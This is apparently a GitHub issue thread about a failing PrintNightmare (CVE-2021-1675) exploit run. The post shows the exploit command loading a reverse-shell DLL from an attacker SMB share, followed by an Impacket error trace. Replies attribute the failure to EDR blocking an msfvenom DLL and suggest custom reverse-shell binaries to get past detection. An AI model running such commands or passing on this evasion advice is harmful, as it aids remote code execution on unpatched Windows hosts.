SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been clo
czz1233 opened this issue · 3 comments
sudo python3 CVE-2021-1675.py test.local/chen:123.com@192.168.121.136 '\192.168.121.128\smb\reverse.dll'
[] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL
[] Executing ??\UNC\192.168.121.128\smb\reverse.dll
[] Try 1...
[] Stage0: 0
[] Try 2...
[] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 192, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)
Hello! This error happens to me because my EDR detects and blocks the dll. Try making another dll or exe file and this error will disappear.
Hello! This error happens to me because my EDR detects and blocks the dll. Try making another dll or exe file and this error will disappear.
How did you solve it
I stopped generating a dll with msfvenom! I wrote my own reverse shell exe and experimented, and I searched here in github reverse shell dll's to test and this error stopped.